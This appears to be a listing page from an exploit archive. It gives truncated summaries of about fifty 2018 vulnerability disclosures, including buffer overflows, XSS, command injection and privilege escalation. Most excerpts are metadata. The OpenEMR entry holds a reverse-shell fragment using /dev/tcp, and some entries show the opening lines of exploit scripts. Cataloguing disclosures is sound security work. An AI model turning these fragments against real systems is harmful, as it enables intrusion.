Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR DEP Bypass)

Foxit Reader 9.0.1.1049 - Buffer Overflow ASLR DEP Bypass %PDF 1 0 obj 2 0 obj /S /JavaScript /JS / Exploit Title: Foxit Reader 9.0.1.1049 - Buffer Overflow ASLRDEP Date: 2018-08-04 Exploit Author: Manoj Ahuje Tested on: Windows 7 Pro x32 Software Link:...

OpenEMR 5.0.1 - (Authenticated) Remote Code Execution

OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...

QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)

QNap QVR Client 5.0.3.23100 - Denial of Service PoC Exploit Title : QNap QVR Client 5.0.3.23100 - Denial of Service PoC Discovery by : Rodrigo Eduardo Rodriguez Discovery Date : 2018-08-06 Vendor Homepage: http://www.qnapsecurity.com/n/en/ Software Link :...

Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)

Monstra-Dev 3.0.4 - Cross-Site Request Forgery Account Hijacking Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request ForgeryAccount Hijacking Date: 2018-08-04 Exploit Author: Nainsi Gupta Vendor Homepage: http://monstra.org/ Product Name: Monstra-dev Version: 3.0.4 Tested on: Windows 10...

AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)

AgataSoft Auto PingMaster 1.5 - Buffer Overflow SEH Exploit Title: AgataSoft Auto PingMaster 1.5 - Buffer Overflow SEH Date: 2018-08-03 Exploit Author: bzyo Twitter: @bzyo Vulnerable Software: AgataSoft Auto PingMaster 1.5 Vendor Homepage: http://agatasoft.com/ Version: 1.5 Software Link :...

Subrion CMS 4.2.1 - Cross-Site Scripting

Subrion CMS 4.2.1 - Cross-Site Scripting Exploit Title: Subrion CMS- 4.2.1 XSS Using component with known Vulnerability Date: 02-08-2018 Exploit Author: Zeel Chavda Vendor Homepage: https://subrion.org/ Software Link: https://subrion.org/download/ Version: 4.2.1 REQUIRED Tested on: Windows,FireFo...

Sitecore.Net 8.1 - Directory Traversal

Sitecore.Net 8.1 - Directory Traversal Exploit Title: Sitecore.Net 8.1 - Directory Traversal Date: 2018-04-23 CVE: CVE-2018-7669 Researcher: Chris Moberly at The Missing Link Security Vendor: Sitecore Version: CMS - 8.1 and up earlier versions untested Authentication required: Yes An issue was...

CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)

CloudMe Sync 1.10.9 - Buffer Overflow SEHDEP Bypass Exploit Title: CloudMe Sync 1.10.9 - Buffer Overflow SEHDEP Bypass Date: 2018-08-05 Exploit Author: Manoj Ahuje Linkedin: https://www.linkedin.com/in/manojahuje/ Vendor Homepage: https://www.cloudme.com/ Software Link:...

Wavemaker Studio 6.6 - Server-Side Request Forgery

Wavemaker Studio 6.6 - Server-Side Request Forgery Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery SSRF. Exploit Author: Gionathan "John" Reale Google Dork: N/A Date: 2018-08-01 Vendor Homepage: http://www.wavemaker.com/ Software Link:...

CMS ISWEB 3.5.3 - Directory Traversal

CMS ISWEB 3.5.3 - Directory Traversal Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal Date: 2018-08-01 Exploit Author: Thiago "thxsena" Sena Vendor Homepage: http://www.isweb.it Version: 3.5.3 Tested on: Linux CVE : N/A PoC: CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file...

Open-AudIT Community 2.2.6 - Cross-Site Scripting

Open-AudIT Community 2.2.6 - Cross-Site Scripting Exploit Title: Open-AudIT Community 2.2.6 - Cross-Site Scripting Google Dork:NA Exploit Date: 2018-08-01 Exploit Author: Ranjeet Jaiswal Vendor Homepage: https://opmantek.com/ Software Link:https://opmantek.com/network-tools-download/open-audit/...

LAMS 3.1 - Cross-Site Scripting

LAMS 3.1 - Cross-Site Scripting Exploit Title: LAMS 3.1 - Cross-Site Scripting Date: 2018-08-05 Exploit Author: Nikola Kojic Website: https://ras-it.rs/ Vendor Homepage: https://www.lamsfoundation.org/ Software Link: https://www.lamsfoundation.org/downloadshome.htm Category: Web Application...

onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)

onArcade 2.4.2 - Cross-Site Request Forgery Add Admin Exploit Title: Cross-Site Request Forgery Add Admin Google Dork: Powered by onArcade v2.4.2 Date: 2018/August/4 Author: r3m0t3nu11Zero-way Software Link: "http://www.onarcade.com" Version: "Uptodate" the appilication is vulnerable to CSRF atta...

Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation

Fortinet FortiClient 5.2.3 Windows 10 x64 Creators - Local Privilege Escalation include "stdafx.h" include include include include pragma comment lib,"psapi" PULONGLONG leakbuffer = PULONGLONGVirtualAllocLPVOID0x000000001a000000, 0x2000, MEMRESERVE | MEMCOMMIT, PAGEREADWRITE; ULONGLONG...

Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection

Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Vuze Bittorrent Client's SSDP Processing Reserved CVE: CVE-2018-13417 Vulnerability Overview The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML...

Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection

Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing Reserved CVE: CVE-2018-13415 Vulnerability Overview The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External...

Wedding Slideshow Studio 1.36 - Buffer Overflow

Wedding Slideshow Studio 1.36 - Buffer Overflow Exploit Title: Socumsoft Wedding Slideshow Studio 1.36 Date: 02.08.2018 Exploit Author: Achilles Vendor Homepage: http://www.socusoft.com Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe Tested on OS: Windows 7 64-bit D...

cgit 1.2.1 - cgit_clone_objects() Directory Traversal

cgit 1.2.1 - cgitcloneobjects Directory Traversal There is a directory traversal vulnerability in cgitcloneobjects, reachable when the configuration flag enable-http-clone is set to 1 default: void cgitcloneobjectsvoid if !ctx.qry.path cgitprinterrorpage400, "Bad request", "Bad request"; return; ...

PHP Template Store Script 3.0.6 - Cross-Site Scripting

PHP Template Store Script 3.0.6 - Cross-Site Scripting Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name Date: 02.08.2018 Site Titel : Exclusive Scripts Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...

CoSoSys Endpoint Protector 4.5.0.1 - (Authenticated) Remote Root Command Injection

CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018 Author : 0x09AL Tested on : Endpoint Protector 4.5.0.1 Softwar...

Seq 4.2.476 - Authentication Bypass

Seq 4.2.476 - Authentication Bypass Exploit Title: Seq 4.2.476 - Authentication Bypass Date: 2018-08-02 Exploit Author: Daniel Chactoura Vendor Homepage: https://getseq.net/ Software Link: https://getseq.net/Download/All Version: = 4.2.476 CVE : CVE-2018-8096 Post Reference:...

PageResponse FB Inboxer Add-on 1.2 - search_field SQL Injection

PageResponse FB Inboxer Add-on 1.2 - searchfield SQL Injection Exploit Title: FB Inboxer 1.2 - 'searchfield' SQL Injection Google Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage:...

TI Online Examination System v2 - Arbitrary File Download

TI Online Examination System v2 - Arbitrary File Download Exploit Title: TI Online Examination System v2 - Arbitrary File Download Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 Version: 2....

AgataSoft Auto PingMaster 1.5 - Host name Denial of Service (PoC)

AgataSoft Auto PingMaster 1.5 - Host name Denial of Service PoC Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-02 Vendor Homepage: http://agatasoft.com/ Software Link : http://agatasoft.com/PingMaster.exe Tested...

Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation

Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation / Exploit Title: Solaris/OpenSolaris AVS kernel code execution Google Dork: if applicable Date: 24/7/2018 Exploit Author: mu-b Vendor Homepage: oracle.com Software Link: Version: Solaris 10, Solaris Sun Opensolaris include include include...

WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)

WityCMS 0.6.2 - Cross-Site Request Forgery Password Change input type="hidden" name="groupe"...

Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection

Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML...

SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)

SecureSphere 12.0.0.50 - SealMode Shell Escape Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SecureSphere v12.0.0.50 - SealMode Shell Escape root", 'Description' = %q This module...

Imperva SecureSphere 11.5 12.0 13.0 - Privilege Escalation

Imperva SecureSphere 11.5 12.0 13.0 - Privilege Escalation Title: Imperva SecureSphere = v13 - Privilege Escalation Author: 0x09AL Date: 01/08/2018 Tested on: Imperva SecureSphere 11.5,12.0,13.0 Vendor: https://www.imperva.com/ Vulnerability Description There is a program named PCE.py which runs ...

ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution

ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Exploit Title: ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/...

WebRTC - VP8 Block Decoding Use-After-Free

WebRTC - VP8 Block Decoding Use-After-Free There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block is then treated a pointer, leading to a crash in WebRTC. ==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc 0x0000014cde2f bp...

WebRTC - H264 NAL Packet Processing Type Confusion

WebRTC - H264 NAL Packet Processing Type Confusion Type confusion can occur when processing a H264 packet. In the method PacketBuffer::FindFrames in modules/videocoding/packetbuffer.cc there is a loop on line 296 that goes through the databuffer vector backwards. The flag ish264 is set before thi...

Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)

Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow PoC Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC Vulnerability Type: SEH Overwrite POC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-01 Software Link:...

WebRTC - FEC Processing Overflow

WebRTC - FEC Processing Overflow There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incomingrtppacket, which is an RTP packet with a mac length that is defined by the transport 2048 bytes for...

LG NAS 3718.510.a0 - Remote Command Execution

LG NAS 3718.510.a0 - Remote Command Execution LG NAS 3718.510.a0 - Remote Command Execution Author: @0x616163 Date: 2018-07-29 Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ CVE: N/A Firmware Version: 3718.510.a0 !/usr/bin/env python import sys impor...

ipPulse 1.92 - Licence Key Denial of Service (PoC)

ipPulse 1.92 - Licence Key Denial of Service PoC Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovery Date: 2018-07-30 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link:...

Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection

Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Date: 2018-07-20 Software Link: https://github.com/nystudio107/craft-seomatic Exploit Author: Sebastian Kriesten 0xB455 Contact:...

Switch Port Mapping Tool 2.81 - SNMP Community Name Denial of Service (PoC)

Switch Port Mapping Tool 2.81 - SNMP Community Name Denial of Service PoC Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://switchportmapper.com/ Software Link :...

ipPulse 1.92 - IP AddressHostName-Comment Denial of Service (PoC)

ipPulse 1.92 - IP AddressHostName-Comment Denial of Service PoC Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link :...

Responsive Filemanager 9.13.1 - Server-Side Request Forgery

Responsive Filemanager 9.13.1 - Server-Side Request Forgery Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery Date: 2018-07-29 Exploit Author: GUIA BRAHIM FOUAD Vendor Homepage: http://responsivefilemanager.com/ Software Link:...

H2 Database 1.4.197 - Information Disclosure

H2 Database 1.4.197 - Information Disclosure Exploit Title: H2 Database 1.4.197 - Information Disclosure Date: 2018-07-16 Exploit Author: owodelta Vendor Homepage: www.h2database.com Software Link: http://www.h2database.com/html/download.html Version: all versions Tested on: Linux CVE :...

fusermount - user_allow_other Restriction Bypass and SELinux Label Control

fusermount - userallowother Restriction Bypass and SELinux Label Control / It is possible to bypass fusermount's restrictions on the use of the "allowother" mount option as follows if SELinux is active. Here's a minimal demo, tested on a Debian system with SELinux enabled in permissive mode:...

Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)

Allok MOV Converter 4.6.1217 - Buffer Overflow SEH Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow SEH Date: 2018-07-29 Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Software Link: http://www.alloksoft.com/allokmovconverter.exe Tested Version: 4.6.1217...

Charles Proxy 4.2 - Local Privilege Escalation

Charles Proxy 4.2 - Local Privilege Escalation Charles Proxy is a great mac application for debugging web services and inspecting SSL traffic for any application on your machine. In order to inspect the SSL traffic it needs to configure the system to use a proxy so that it can capture the packets...

Microsoft Windows Kernel - win32k!NtUserConsoleControl Denial of Service (PoC)

Microsoft Windows Kernel - win32k!NtUserConsoleControl Denial of Service PoC / Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service PoC Author: vportal Date: 2018-07-27 Vendor homepage: http://www.microsoft.com Version: Windows 7 x86 Tested on: Windows 7 x86...

NetScanTools Basic Edition 2.5 - Hostname Denial of Service (PoC)

NetScanTools Basic Edition 2.5 - Hostname Denial of Service PoC Exploit Title: NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service PoC Discovery by: Luis Martínez Discovery Date: 2018-07-26 Vendor Homepage: https://www.netscantools.com/ Software Link :...

Online Trade 1 - Information Disclosure

Online Trade 1 - Information Disclosure Exploit Title: Online Trade 1 - Information Disclosure Exploit Author: Dhamotharan Date: 2018-07-17 Vendor Homepage: https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?srank=14 CVE : CVE-2018-14328 Version: 1...

Skia - Heap Overflow in SkScan::FillPath due to Precision Error

Skia - Heap Overflow in SkScan::FillPath due to Precision Error There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached...

QNap QVR Client 5.1.1.30070 - Password Denial of Service (PoC)

QNap QVR Client 5.1.1.30070 - Password Denial of Service PoC Exploit Title: QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service PoC Discovery by: Luis Martínez Discovery Date: 2018-07-26 Vendor Homepage: https://www.qnapsecurity.com/n/en/ Software Link :...

SoftNAS Cloud 4.0.3 - OS Command Injection

SoftNAS Cloud 4.0.3 - OS Command Injection Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SoftNAS Cloud OS Command Injection 1. Advisory Information Title: SoftNAS Cloud OS Command Injection Advisory ID: CORE-2018-0009 Advisory URL:...